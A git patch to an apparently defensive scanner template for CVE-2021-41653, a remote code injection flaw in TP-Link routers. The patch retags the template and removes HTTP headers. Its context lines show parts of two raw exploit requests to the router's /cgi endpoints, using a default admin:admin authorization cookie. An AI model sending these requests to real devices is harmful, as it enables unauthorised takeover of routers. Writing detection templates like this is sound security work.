From 0b82e570d1a58d08d687905174730d431db4ba5f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 30 Nov 2021 22:22:16 +0530 Subject: [PATCH] Update CVE-2021-41653.yaml --- cves/2021/CVE-2021-41653.yaml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index 51cb810d9a..4626e4d030 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -8,21 +8,18 @@ info: reference: - https://k4m1ll0.com/cve-2021-41653.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - tags: cve,cve2021,tplink,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-41653 cwe-id: CWE-94 + tags: cve,cve2021,tplink,rce,router requests: - raw: - | POST /cgi?2 HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Content-Type: text/plain Referer: http://{{Hostname}}/mainFrame.htm Cookie: Authorization=Basic YWRtaW46YWRtaW4= @@ -35,11 +32,9 @@ requests: X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested + - | POST /cgi?7 HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Content-Type: text/plain Referer: http://{{Hostname}}/mainFrame.htm Cookie: Authorization=Basic YWRtaW46YWRtaW4=